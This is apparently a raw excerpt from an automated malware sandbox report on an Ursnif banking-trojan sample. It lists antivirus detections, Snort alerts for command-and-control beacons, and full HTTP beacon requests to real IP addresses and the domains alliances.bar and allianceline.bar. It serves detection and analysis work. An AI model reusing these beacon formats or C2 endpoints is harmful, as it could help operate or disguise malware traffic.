Source: 3.2.regsvr32.exe.10000000.4.unpack |
Avira: Label: TR/Crypt.XPACK.Gen8 |
Source: 4.2.rundll32.exe.10000000.4.unpack |
Avira: Label: TR/Crypt.XPACK.Gen8 |
Source: 0.2.loaddll32.exe.10000000.3.unpack |
Avira: Label: TR/Crypt.XPACK.Gen8 |
Source: unknown |
HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49728 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49729 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.3:49733 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.3:49732 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.3:49735 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.3:49734 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 216.58.215.230:443 -> 192.168.2.3:49737 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 216.58.215.230:443 -> 192.168.2.3:49736 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49748 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49749 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49750 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49751 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49752 version: TLS 1.2 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49764 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49764 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49765 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49765 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49766 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49766 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49767 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49767 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49768 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49768 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49769 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49769 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49770 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49770 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49773 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49773 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49775 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49777 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49777 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49778 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49779 -> 162.255.119.73:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49782 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49793 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49793 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49795 -> 162.255.119.73:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49794 -> 162.255.119.73:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49794 -> 162.255.119.73:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49797 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49796 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49796 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49798 -> 162.255.119.245:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49801 -> 198.54.117.211:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49805 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49806 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49806 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49807 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49807 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49809 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49809 -> 195.110.59.2:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49810 -> 162.255.119.73:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49810 -> 162.255.119.73:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49813 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49813 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49812 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49812 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49814 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49814 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49815 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49815 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49816 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49816 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49817 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49817 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49820 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49820 -> 198.54.117.210:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49822 -> 162.255.119.245:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49822 -> 162.255.119.245:80 |
Source: Traffic |
Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49825 -> 198.54.117.217:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49825 -> 198.54.117.217:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49827 -> 162.255.119.73:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49829 -> 198.54.117.217:80 |
Source: Traffic |
Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49831 -> 195.110.59.2:80 |
Source: global traffic |
HTTP traffic detected: GET /jdraw/eWbkeEy29Mk9inNA7c/ATuO3Prha/DtolimWlXpnk8nFP0lSw/2yNlaC5cCiMklCCNwvu/sQNUZO_2Fm1xZzA1gS_2FG/9kTrosYW0_2Fm/VKROzRO8/gAsB4lDIAfyynMPz_2BNLur/ogiNTGjuy5/h8pifSL4zzmkbAEY1/43YSZu3Y6Aaj/v_2BXUswAoj/3H8D7Kh5Eubf1gg9Yf/HP.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/eWbkeEy29Mk9inNA7c/ATuO3Prha/DtolimWlXpnk8nFP0lSw/2yNlaC5cCiMklCCNwvu/sQNUZO_2Fm1xZzA1gS_2FG/9kTrosYW0_2Fm/VKROzRO8/gAsB4lDIAfyynMPz_2BNLur/ogiNTGjuy5/h8pifSL4zzmkbAEY1/43YSZu3Y6Aaj/v_2BXUswAoj/3H8D7Kh5Eubf1gg9Yf/HP.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/eWbkeEy29Mk9inNA7c/ATuO3Prha/DtolimWlXpnk8nFP0lSw/2yNlaC5cCiMklCCNwvu/sQNUZO_2Fm1xZzA1gS_2FG/9kTrosYW0_2Fm/VKROzRO8/gAsB4lDIAfyynMPz_2BNLur/ogiNTGjuy5/h8pifSL4zzmkbAEY1/43YSZu3Y6Aaj/v_2BXUswAoj/3H8D7Kh5Eubf1gg9Yf/HP.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/eWbkeEy29Mk9inNA7c/ATuO3Prha/DtolimWlXpnk8nFP0lSw/2yNlaC5cCiMklCCNwvu/sQNUZO_2Fm1xZzA1gS_2FG/9kTrosYW0_2Fm/VKROzRO8/gAsB4lDIAfyynMPz_2BNLur/ogiNTGjuy5/h8pifSL4zzmkbAEY1/43YSZu3Y6Aaj/v_2BXUswAoj/3H8D7Kh5Eubf1gg9Yf/HP.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/eWbkeEy29Mk9inNA7c/ATuO3Prha/DtolimWlXpnk8nFP0lSw/2yNlaC5cCiMklCCNwvu/sQNUZO_2Fm1xZzA1gS_2FG/9kTrosYW0_2Fm/VKROzRO8/gAsB4lDIAfyynMPz_2BNLur/ogiNTGjuy5/h8pifSL4zzmkbAEY1/43YSZu3Y6Aaj/v_2BXUswAoj/3H8D7Kh5Eubf1gg9Yf/HP.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/eWbkeEy29Mk9inNA7c/ATuO3Prha/DtolimWlXpnk8nFP0lSw/2yNlaC5cCiMklCCNwvu/sQNUZO_2Fm1xZzA1gS_2FG/9kTrosYW0_2Fm/VKROzRO8/gAsB4lDIAfyynMPz_2BNLur/ogiNTGjuy5/h8pifSL4zzmkbAEY1/43YSZu3Y6Aaj/v_2BXUswAoj/3H8D7Kh5Eubf1gg9Yf/HP.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/eWbkeEy29Mk9inNA7c/ATuO3Prha/DtolimWlXpnk8nFP0lSw/2yNlaC5cCiMklCCNwvu/sQNUZO_2Fm1xZzA1gS_2FG/9kTrosYW0_2Fm/VKROzRO8/gAsB4lDIAfyynMPz_2BNLur/ogiNTGjuy5/h8pifSL4zzmkbAEY1/43YSZu3Y6Aaj/v_2BXUswAoj/3H8D7Kh5Eubf1gg9Yf/HP.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/AZ9j6FN_2FTyei6/Zf0uCNl_2FdnsseDLQ/aAlru6mfg/_2BxJ18hXN8l3o6HRZtg/iMkRHAWOXQH7Sonii2y/ZUDDqy42horX1ipsJquAAp/PE_2BV88LYzPh/_2BwspqN/QHL0gRAjrGmh0Ze8EXmvwJx/w8RwH_2Fv_/2FEesIeaXL2YGMyBr/PGDsr7HWeSeF/e3J46D1VO9zlgcp/85Zp5.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/p8BTc7rmN9rFz/dvVilNn8/1u0hUUFj3rLKVzUph9HCH9E/7PtciZB2lc/xpKpNIjlUqwM7Qoac/vY0xEhkDTdYg/zhCk8i_2Bc_/2BlBoMsKptZ_2F/zRnhMePPGQCsqYLwQD3Ue/lgSW5rDODttJ7i78/1NWLOGS4u6LI4sn/Z_2F736jFES7IEU0n1/BASM_2F10/Djh4bcFW/rXwgDHJ.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/exPqHXDWoHjGDSQp9Aa/A_2B2jfV7Yu2z_2F81zrpc/4Hw3JjoG2C8FN/up0W_2Bg/2cOat_2FhB8XpeJI3Q4OrPd/3mcscxr_2F/XUcES9vbQCWR_2B2J/uVjKr_2FUQUP/ppEuzTVHGdh/cpJRHYjRekTIXI/zfM7YD6vGfq08eHNZhWho/thDyCd6IXfvgcRaJ/JjtQarSthDB/50HgVr4R/Z.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/KzfCuU1nYQ/2jKJWMeBiltqUkBZk/bJHRs3aRSUlv/cI63tiCHI_2/F5uaZGCIn42HAA/37yNTKIJLuVjIBN3j61BH/f_2F7jKyVaT3WSHP/Idyt_2BFxwVV7Ez/wF0a5CSrL3svyQDzt7/z5kTlRVsI/o_2BijKkihsvPwp7ObK8/nGfEqkF_2BV9O_2BYHe/y7YIFWRDvDFDsnXQU1dk4w/ugyqJTKGN21dPtrvVHSLW/X.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/eNEjgfypiWX/qzBN0pjHkXaIJy/uSQAHTqmu7LUbuntarKiK/xwqbRspQk1D8qp6M/HWl7bj_2FWhMbP8/Uujd82PrM7mxT3Qzg0/MWYHS6cay/F6rvctGR9QcGUIn_2BcA/FoElIX9k6apV8hveoXo/zNk4xAZcRLb7MRvJXwEutR/loIAT32m6_2BY/8Nz5PjSgzU6nn7nO/fTwM.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: allianceline.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/PjuRunwYj4Bhvxk9T/FkaG6F1W0LAq/7ctDH_2F3Sg/7ugfKJqoxNQwsg/2ypZ1ap9U9TAmPNK3Mj4E/1tkWj6xiOwNb06Ci/nMiIDTqZjqNR3Sl/Be2FTUJy9LUIgqGDgy/uKg22hRQ4/Py3DVyO8YWF3rk9X3HQr/yNaCoWiag_2BmQ7jPMJ/8l4YPxQA8wBHHEka2W3QS6/U7.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/_2Fgi_2F0q9mbLIMOTyI/MSZHR0hHa_2BmeQiSR3/W8oggZpI5myExagD6_2BTj/ey2UGr7NbceZG/WQBy5MHE/7qXKpRH7zu077im_2F1dGJV/DbKkDe7jsz/yWoZjzp1UojMkJrXW/XsiPUNe_2BZ8/DIfEiNMAFM1/A0a2dGIo685cVI/iUyIhZAYyWsoPEjMSHZWX/6iyEp102eL/_2F_2FrX.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/4trhqHpiyJW/gPL61gbH3V3gm2/GiN8WmuvnoRNfvQO06HHD/TolcFVz_2FK8ZYP2/IZQ72utUu8FkRq_/2F067OV_2FLlPUB9yd/i0sqdLKlL/TufDKlZhewFrgjSOjZoV/kw8l6gL0iujBb8tryKS/RGvMacSQhLHBDOTrqNLG4m/uP_2BKAulmZfa/zQq7CHkj/_2F1r9d83Jng_2Fktvq5Alz/Ls6WH3GEdzGxn/iTBX.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: allianceline.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/_2FYs4QtMw9_2FVqLpLk2/u2LhzC7LFlqce_2B/EJ5CkL6CyTor06H/h9Yb_2BSjV6Rt1SZIu/4F9iSiMa_/2FMSVlcf9Qu31roXh0J1/XT62QjG3DHbjtCzAO_2/B_2BsPQzjxGsde0UbMxPHp/SJcz88c_2Fs5k/867jz4YW/Gav8pspEQfvIQYY_2FHZoiA/PuUT_2Brpo/dSi_2Fsd7qdqVkqsa/uXH9U_2BtkCW/nt_2FeA79Sp7/ATp1A.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: allianceline.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/_2FrlUhAClUiRyd8MwHtotk/I15TfspZAu/z01In076RAgynlo0F/aYBbR51uD1ML/uqQjbpxmeKc/L1amjLGDxOxIiq/2XLubSbffIPK0HbrHa2Lp/bjwJ7voTFzEKCY0F/aF6dVKQS112UAXS/aj4vTb6dDSsIFCUQVZ/qIZSdMQKF/8UI5q4eMPwG_2F8fIXwq/rx107CtEv/H.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/Rb3_2FHxtxhMSM8zm/gYEt3B3r9PE_/2FfL3q236io/GFNEH8CEcSGt3Q/Xgu6vIh5KIqx2S1Mrc6dl/0kCNyz0GTV6jaECQ/HiARcYhZ2Mqz_2B/BvbQ_2BHUEEnwRiksm/RXQ1zWOs_/2FRb8_2BzO0AkhcyX4o0/Pn9DN_2FJYMQOU8vTzr/Vm4hzNy1B7dqRs9x0qSEE3/RgCr9ZktG/Z3C.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/i1UnGotMRZpYX5QI846/jmFIJI_2FNDz7pkL8TrBB5/fMotNSc0eJn6p/utqPXHuH/Wff27J_2FTjxId_2BES1z1r/M_2BkcXpyD/K_2FeY_2Bil3S_2FY/RBcu0ZtIeP_2/BPxc89E_2Bx/cUqugMTx_2BnBm/1nG_2BlJjtyEolJ_2BuVW/_2BuzYeRQBwowEX3/QOcwkE8Q_2Bp3En/Z4CKv0N41kvf6/f6QDpp.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/i1UnGotMRZpYX5QI846/jmFIJI_2FNDz7pkL8TrBB5/fMotNSc0eJn6p/utqPXHuH/Wff27J_2FTjxId_2BES1z1r/M_2BkcXpyD/K_2FeY_2Bil3S_2FY/RBcu0ZtIeP_2/BPxc89E_2Bx/cUqugMTx_2BnBm/1nG_2BlJjtyEolJ_2BuVW/_2BuzYeRQBwowEX3/QOcwkE8Q_2Bp3En/Z4CKv0N41kvf6/f6QDpp.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/b812tUOw/5vOcsr2Qa7HjSQYaeUGfQDe/A8EgAMSWJM/_2FFmfetjQhRMnISV/eMe6aV6DLPBS/5MYu1aKdFNE/STasrOKiCBmv9X/eiZjDwcFHXNTS7hX6rpF6/PjKZwXlQvviQeyWd/_2BR0w7G5Pjv7Hi/LDxSArAenBlCjPFdb5/ZsL4oU8fF/CiH6rXpAguptoVX1zeJh/bT.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/i1UnGotMRZpYX5QI846/jmFIJI_2FNDz7pkL8TrBB5/fMotNSc0eJn6p/utqPXHuH/Wff27J_2FTjxId_2BES1z1r/M_2BkcXpyD/K_2FeY_2Bil3S_2FY/RBcu0ZtIeP_2/BPxc89E_2Bx/cUqugMTx_2BnBm/1nG_2BlJjtyEolJ_2BuVW/_2BuzYeRQBwowEX3/QOcwkE8Q_2Bp3En/Z4CKv0N41kvf6/f6QDpp.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/dLL7q72MwgF/_2BKoRFjbhgJAS/vzNzOQYcs22fS9PZmGiqk/ImBn4ZbMkjp0c79n/fXFEqaYEWVKY_2F/_2FJyGoOXr4VTVC0eg/LUPZCf_2B/C1_2BlEDEf8ijbPT3XDP/4GbLjdNj_2Ft1xIX937/olnPKLY6LOBYxvJBmWK5iG/ofDL9uajZoReh/gnTfiCz_/2FJnM9VsOUm_2FxBFWygfHA/WN_2FWTfKr/cGyLVu_2BuD/D0vz.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: allianceline.barConnection: Keep-Alive |
Source: global traffic |
